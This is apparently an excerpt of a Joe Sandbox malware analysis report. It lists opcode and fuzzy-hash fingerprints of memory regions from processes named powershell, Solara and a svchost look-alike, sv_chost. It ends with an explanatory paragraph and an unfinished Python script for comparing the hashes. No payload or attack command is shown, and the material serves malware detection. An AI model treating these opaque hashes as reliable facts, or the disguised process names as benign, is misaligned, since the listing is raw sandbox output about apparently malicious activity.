                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: N_^4$N_^7$N_^F$N_^J
                                                                • API String ID: 0-3508309026
                                                                • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                • Instruction ID: 7573f7cc0f08f889b6fda03452d193ae9225bc5c6eed64408cc2b2fddd6c9c2d
                                                                • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                • Instruction Fuzzy Hash: B42104B7B080254ED3057BBCAC249DA3B40DF9477478942B2D2A9CF183ED24708B8AC2
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b233e89752e02575d9b8fd6018433b218da37517f0ece8033615b117ba1a507e
                                                                • Instruction ID: ea4fedb506264e21d4016142f313fc38934c3b5f43a0ed061cd2822ab555b892
                                                                • Opcode Fuzzy Hash: b233e89752e02575d9b8fd6018433b218da37517f0ece8033615b117ba1a507e
                                                                • Instruction Fuzzy Hash: 5542E561B1DA494FE7A8EB6C8475AB977D2FF98300F5405BDE01EC72D6DE28B8018781
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b53e68bec2fcc632ad60f13ce41dea413f870ea83a0f5dfd5c0063f35fba354d
                                                                • Instruction ID: 3b410b73f37372e78e7b5e139f4e81482755dc93fe6ebadb03f1d649edc206b3
                                                                • Opcode Fuzzy Hash: b53e68bec2fcc632ad60f13ce41dea413f870ea83a0f5dfd5c0063f35fba354d
                                                                • Instruction Fuzzy Hash: E522E561B1DA494FE7A8EB6C84756B877D2FF98300F9505BDE01EC72D6DE28B8018781
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5221ee5542a95fe40998aa878c1ee4caf6505aa9e5196daa6d39189c8dfe2985
                                                                • Instruction ID: d757c097e3828367e1ea39a17eb3e103786f5e0b93ddfd92eb5ff7e949e3908f
                                                                • Opcode Fuzzy Hash: 5221ee5542a95fe40998aa878c1ee4caf6505aa9e5196daa6d39189c8dfe2985
                                                                • Instruction Fuzzy Hash: A131C070B18A0E8FEB44EBB88471ABD77A1FF98300F9545B5D019C72DBDE38A9028750
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88f05baf98ce8ecc897647150257fc4dfbd71430ca9e61301680ba6eee970b78
                                                                • Instruction ID: e37c293d695b087a3e6f5e660a6089b4358581a32909b0717767b7b4124b75ae
                                                                • Opcode Fuzzy Hash: 88f05baf98ce8ecc897647150257fc4dfbd71430ca9e61301680ba6eee970b78
                                                                • Instruction Fuzzy Hash: E031D3A6B4D9498FDB58DB6C94B09B93FA1BFC5200B8444F5D0198B3EBDF38AD058391
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c18b4399305e39abd870dee13c7cc3aa9475f2999bd36a115ac1e06263b6dda
                                                                • Instruction ID: a4118af01e3b15dd458e4774352b0a3628c7e4c1812acee53fe4e9c01336649b
                                                                • Opcode Fuzzy Hash: 3c18b4399305e39abd870dee13c7cc3aa9475f2999bd36a115ac1e06263b6dda
                                                                • Instruction Fuzzy Hash: 1D216722F0DA890FE751A76C98715747BD0EF96321B0905E6E899CB1E7D924BD418381
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92caa0dc9ee5dd42f923db73bf5a46a254027b57e06fac70d7f33dcca418422c
                                                                • Instruction ID: 0228cc8c526cef04e7bd1e32dd2abce9e59298e7aeb2cf0b32118d0f844e40c7
                                                                • Opcode Fuzzy Hash: 92caa0dc9ee5dd42f923db73bf5a46a254027b57e06fac70d7f33dcca418422c
                                                                • Instruction Fuzzy Hash: 0CD01761A24C1E4AE758A79888B55FEA7A1FF48280B8040B4903E961E6DE7439018240
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2284366690.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b770000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X7,r
                                                                • API String ID: 0-2313384186
                                                                • Opcode ID: d09c30be62281b74eb94829e988263c9277e4dd6eff007fcd75d567d57741e4d
                                                                • Instruction ID: 9aa0b2499d208c12526e624d7beca4a7d9cbeef3689c1cd1094538ef0b199b5e
                                                                • Opcode Fuzzy Hash: d09c30be62281b74eb94829e988263c9277e4dd6eff007fcd75d567d57741e4d
                                                                • Instruction Fuzzy Hash: EFC14732B0EB8E4FEBA5EBA848A59B57B91EF15314B0902FED44DC70FBD954E8058341
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9fffbe6563fe343c08fed45d91534b0af6491552e28cbc8a6081e3da177d5cc3
                                                                • Instruction ID: 24eed49537d41b3fd34e60cc80e1a7b00fbcbf7e8f28573350d4530a8d6efc6c
                                                                • Opcode Fuzzy Hash: 9fffbe6563fe343c08fed45d91534b0af6491552e28cbc8a6081e3da177d5cc3
                                                                • Instruction Fuzzy Hash: 61D17F31A18A4D8FDF94DF5CC4A5AA9BBE1FF68300F15416AD41DDB2A6CA34F841CB81
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e68c14051dcff05d1abb4288e8f3566e9392a6fb39684ef9ed6fe4d962eb563b
                                                                • Instruction ID: ab3e9dd2a17e59c60269ba9727bb16bfdb6033aa1b45bd1d08d3c83f33a6d2aa
                                                                • Opcode Fuzzy Hash: e68c14051dcff05d1abb4288e8f3566e9392a6fb39684ef9ed6fe4d962eb563b
                                                                • Instruction Fuzzy Hash: FD114C6650E7CD4FDB539B2888690A47FB0EF13214B0A02EBD498CF0B3DA196909C762
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2280074223.00007FFD9B58D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B58D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b58d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88582579ba3276e2ae136a48589b1fed28e81475e712f9adedfdc62bd7b10b37
                                                                • Instruction ID: 54772409aa49d5010abd9ed8291f8261132fc1f0111568d773f4a7944ed35428
                                                                • Opcode Fuzzy Hash: 88582579ba3276e2ae136a48589b1fed28e81475e712f9adedfdc62bd7b10b37
                                                                • Instruction Fuzzy Hash: AD41267140EFC44FE7979B29E8559523FF0EF52320B1A05DFD088CB1A3D625A846C7A2
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4548d9b1e1190000c71b51384d76af427f77e449de226907b646a9deb7607599
                                                                • Instruction ID: 3ebf8760c6e0be89834494aacb7d3567f4d0b7315b9212e2f681388082173e71
                                                                • Opcode Fuzzy Hash: 4548d9b1e1190000c71b51384d76af427f77e449de226907b646a9deb7607599
                                                                • Instruction Fuzzy Hash: F0318130A1CA4C9FDB1CDB5CA84A6A9BBE0FB99311F00422FE45993251CB70A8558BC2
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 86996eedd0b03693bc9e35093a8bce0cece7cc0eea225386cbf9005f75011ab8
                                                                • Instruction ID: e5037ad34da5db96ea7cd1103d2b0c574710264d80f6537a825649f763e7d82d
                                                                • Opcode Fuzzy Hash: 86996eedd0b03693bc9e35093a8bce0cece7cc0eea225386cbf9005f75011ab8
                                                                • Instruction Fuzzy Hash: 6F21E63190CB4C4FDB59DFAC984A7E97BF0EB96321F04416FD048C7152DA74A416CB92
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction ID: 53de6e4c5396b4e1d5081cbe3b058e8ded2e7a225d5593b99a771fed33ddcd29
                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction Fuzzy Hash: 6B01A73020CB0C4FDB48EF0CE051AA5B3E0FB89324F10056DE58AC36A1DA32E882CB41
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2284366690.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b770000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0af9669a7916e631a71e9048823bc9070780c28ef617ca43d179c9ec3c6d7376
                                                                • Instruction ID: ac2814f907a2218ba79ea0220bd3ba23e2a708820b51f04576d7f7f4b66fc505
                                                                • Opcode Fuzzy Hash: 0af9669a7916e631a71e9048823bc9070780c28ef617ca43d179c9ec3c6d7376
                                                                • Instruction Fuzzy Hash: 15F0BE32B0E6098FD768EA4CE4918E873E4EF55330B1201BAE06DC75B3CA25EC41C741
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2284366690.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b770000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 21a6e1eaba764bb566ad23324f5d11bc5016e698301296568a48b83c42c900f1
                                                                • Instruction ID: 74f229b1b7cc6dc323ed212656293c6c1d2d7eb1480a1df8b04937984bdc8680
                                                                • Opcode Fuzzy Hash: 21a6e1eaba764bb566ad23324f5d11bc5016e698301296568a48b83c42c900f1
                                                                • Instruction Fuzzy Hash: 4FF05E32B0E6498FD768EA5CE4A58A877E0FF4532176600FAE159CB4B3DA25AC41C750
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2284366690.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b770000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction ID: 24c58a666106ab8d29d881880e0c4af9a426807c3d90cd99f549e1067edd05cb
                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction Fuzzy Hash: ADE01A31B1C9089FDA78EA4CE0919AD73E5EB98331B1202BBD14EC7571CA22ED518B81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M_^4$M_^7$M_^F$M_^J
                                                                • API String ID: 0-622050427
                                                                • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                • Instruction ID: 77295835d202f0da54c8a331038727f56b3a87eefd150163892bcd4c6e8218f8
                                                                • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                • Instruction Fuzzy Hash: 4D21CFA77085699ED3067B7DA8149EA3740CF946747C947F2E1AACF093FD2860878AD0
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2543979339.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9acb98b324ec2d91306157d313e173f5d1894e3596b0d897634da53063827cb5
                                                                • Instruction ID: 85146286229ca02568cdf0d0911073b98a89372bfa33a3280c4567dbca9549fb
                                                                • Opcode Fuzzy Hash: 9acb98b324ec2d91306157d313e173f5d1894e3596b0d897634da53063827cb5
                                                                • Instruction Fuzzy Hash: 1CC14772B0EB8E8FEBA5AAA898655B57BD1EF51310F4902BED44DC70F7D914E801C342
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2542563232.00007FFD9B695000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B695000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b695000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6c914b6d5695f640bf18e9a98b92575e7308961d677ab6e9aafc3af8d425490
                                                                • Instruction ID: d137fe7e3b4695c56d062d7e21d3f57c7b43698f82fb193aaaf0acb70614e383
                                                                • Opcode Fuzzy Hash: f6c914b6d5695f640bf18e9a98b92575e7308961d677ab6e9aafc3af8d425490
                                                                • Instruction Fuzzy Hash: C611EC6A90F7CD4FDB539B6858790A47FB0EE67214B0A00EBD498CF1B3D5196908C792
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2543979339.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e88cd8a0840109c90904563be6155fb480f89fb96d740296cfb9b52fb572434e
                                                                • Instruction ID: d1c55b0fbfa6fc0be4848074a3771d78113a89233deeb6d8c532061c6f970c36
                                                                • Opcode Fuzzy Hash: e88cd8a0840109c90904563be6155fb480f89fb96d740296cfb9b52fb572434e
                                                                • Instruction Fuzzy Hash: C8512722B0EB4A8FE7A9DA5C446257477D2EF95310F5A02BEC05DC71B7DE14EC058342
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2543979339.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 268c209c02c90f324e76b4e36ae37be85b97cc45ca67a6e005d883c6270fff58
                                                                • Instruction ID: b6c4d7b6570db9fe69f7d15f788f3701751d92715cdb72ef66b6512e5711bc80
                                                                • Opcode Fuzzy Hash: 268c209c02c90f324e76b4e36ae37be85b97cc45ca67a6e005d883c6270fff58
                                                                • Instruction Fuzzy Hash: 37412632B0EB498FEBA9D66C94619B47BD1EF41720B0902BED059C70B7EA14AD118342
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2542563232.00007FFD9B695000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B695000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b695000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19cdf4fadf96c2477bd348ce8570af2df988ac590b6d667b97af0b021d89ae58
                                                                • Instruction ID: fe4744f26dd48e95044e487ea1403752fe8dfdf528aad0423ce3474765d81bbf
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_25_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4be05781741098aa620241fd35a579681e0e31b946c0bee4c1f6968f8f117fdc
                                                                • Instruction ID: 1267c48b36b52e4b90e333b02293d0a41f36704f89793480b971e94df8756d96
                                                                • Opcode Fuzzy Hash: 4be05781741098aa620241fd35a579681e0e31b946c0bee4c1f6968f8f117fdc
                                                                • Instruction Fuzzy Hash: 01216722B0DA890FE791BB6CA8605747BD0EF96320B0901F6E95DCB1EBD818BD418381
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cf3c9222bd1432746f33c97496f0908cf304c6353974a509549d179f49cda0bd
                                                                • Instruction ID: 4c63ddf337896cc18032b249246ced871b34fc75f23705e414e3b8499fe130c6
                                                                • Opcode Fuzzy Hash: cf3c9222bd1432746f33c97496f0908cf304c6353974a509549d179f49cda0bd
                                                                • Instruction Fuzzy Hash: C342E521B19A494FEB98FB6C8475AB977D2FF98300F4545B9E01EC72D6DE28B8018781
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 60771ed50c76c0b11e4cb278b3bf67cd65e815fa120d7954f809c4b4f9e45c74
                                                                • Instruction ID: 57ad24b2199a30ed4e458cdb490f2865cd744dcbf46a3b329f56ed5f86b34d44
                                                                • Opcode Fuzzy Hash: 60771ed50c76c0b11e4cb278b3bf67cd65e815fa120d7954f809c4b4f9e45c74
                                                                • Instruction Fuzzy Hash: B822E621B1DA494FEBA8FB6C84756B977D1FF98300F8544B9E01EC72D6CE28B8018781
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5b3501afcf3afb44be7a37d62640455f9fb061608ef015c53281dacfa3f06ee3
                                                                • Instruction ID: 439ad5fd02a2572209646b61ab81353bbae9b9c7aaa300296e7de37dac49664a
                                                                • Opcode Fuzzy Hash: 5b3501afcf3afb44be7a37d62640455f9fb061608ef015c53281dacfa3f06ee3
                                                                • Instruction Fuzzy Hash: E051FD10B1E6C90FE7A6BBB848746756FD1DF87215B0900FBE499CB1E7DD186806C342
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90a39bd01bce4543da48ea94372a512c07b6b977d814194cfce4dc802c4ec4fc
                                                                • Instruction ID: 48035319555ff1bb0d49fc6dd6a8aa5aba41cd2ba6659532d9f3fb8e0c59225d
                                                                • Opcode Fuzzy Hash: 90a39bd01bce4543da48ea94372a512c07b6b977d814194cfce4dc802c4ec4fc
                                                                • Instruction Fuzzy Hash: 0531E862A0D69A0FE705B7AC98B20F97BB1FF41310B4840B7C199CF1E3DD2879068750
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50a10a4acbade51e86efff1a3ca407ccc0948a26dd5ffc65ab8a0149d75d7c3f
                                                                • Instruction ID: 8362f926e101a641d6aabd07656e3af3f4d5d256eaa7ec0480e9a4a8e5c8ba48
                                                                • Opcode Fuzzy Hash: 50a10a4acbade51e86efff1a3ca407ccc0948a26dd5ffc65ab8a0149d75d7c3f
                                                                • Instruction Fuzzy Hash: 51512611B0FACA0FE7A6AB7848651747BD1EF86614B0900FBD49CCB1EBDD18BC068352
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e9f2005a834ecb7e97853b8361dd2ef59858f8005e6bf113f162e749abeac0c
                                                                • Instruction ID: 7fd2f2f6802092b1573cea90017c56595e0c1ba45264784365cb79cd1e3b2972
                                                                • Opcode Fuzzy Hash: 7e9f2005a834ecb7e97853b8361dd2ef59858f8005e6bf113f162e749abeac0c
                                                                • Instruction Fuzzy Hash: A7412921B199094FEB44BBEC586A7BE73D2EF98711F5441B6E01DC72D7DE28A8028381
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8faad2a46d656a32d90cc1ed52a9e2ef461df4fd038493fef2b22693b0a556a7
                                                                • Instruction ID: 606d27e811693fe9b974f67aa703947638a79a7d76da10d55977b0bb43b2386d
                                                                • Opcode Fuzzy Hash: 8faad2a46d656a32d90cc1ed52a9e2ef461df4fd038493fef2b22693b0a556a7
                                                                • Instruction Fuzzy Hash: DC31F321B1C94D0FE798FA6C946A679A6C2EF98315F4401BEE45EC32E7DD64AC428341
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6382dde9b5a5a05f94a9fdc2e58766defd6b7ce49ed03c189d37a646002daec8
                                                                • Instruction ID: 40fa6adf53d28e25ca7b989885685632a453ae841261763ea1e7162d08a6c223
                                                                • Opcode Fuzzy Hash: 6382dde9b5a5a05f94a9fdc2e58766defd6b7ce49ed03c189d37a646002daec8
                                                                • Instruction Fuzzy Hash: 5A318471B19A0D4FDB48FBACC4756BD77A1FF98300F9545B9D019D729ADE3868018740
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e504124feb4746162b809a379668f133a3212013e86a68b8df562009734c9445
                                                                • Instruction ID: cd429f26748b6f654f380789bc1d19bfe8060989f5e99a14c71a2d10f06d0ee0
                                                                • Opcode Fuzzy Hash: e504124feb4746162b809a379668f133a3212013e86a68b8df562009734c9445
                                                                • Instruction Fuzzy Hash: 7731D361B4EA4A4FDB58EB6C44B59B83FA1FF84200BC580BDD0198B3DFCE24A9058785
                                                                Memory Dump Source
                                                                • Source File: 0000001A.00000002.2802112860.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_26_2_7ffd9b6c0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b1d754591e368796cf50c8e80e24404214bf7037c56d380a95f6e2232adb9e32
                                                                • Instruction ID: a527ced170b94cd499b29feb1fda54c87f161d637f1be3bc991a5d1ed50157a3
                                                                • Opcode Fuzzy Hash: b1d754591e368796cf50c8e80e24404214bf7037c56d380a95f6e2232adb9e32
                                                                • Instruction Fuzzy Hash: A6217922F0DA890FE795BB6CA8605347BD0EF96320B0901FAE85DCB1E7DC18BD418381
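The entries above are Joe Sandbox's per-function fingerprints for the code found at offset 00007FFD9B6C0000 in process 25 and in process 26 (both snapshots named sv_chost, both marked "based on PE: false", i.e. the dumped region is not backed by a mapped image). The script below is an added example, not code from Joe Sandbox or from this report: it parses this record format, counts functions per (process, base, PE-backed) dump, and pairs records across the two processes whose Instruction Fuzzy Hashes are close. The similarity used is a plain positional character match, an assumption standing in for the report's own comparison, which the page does not describe; the four embedded records are copied from the section above (the empty API/String ID fields are shown in full only for the first one).

```python
import re
from dataclasses import dataclass
from itertools import combinations

# Constructed sample: four records copied from the report (two per process dump).
SAMPLE_REPORT = """\
Memory Dump Source
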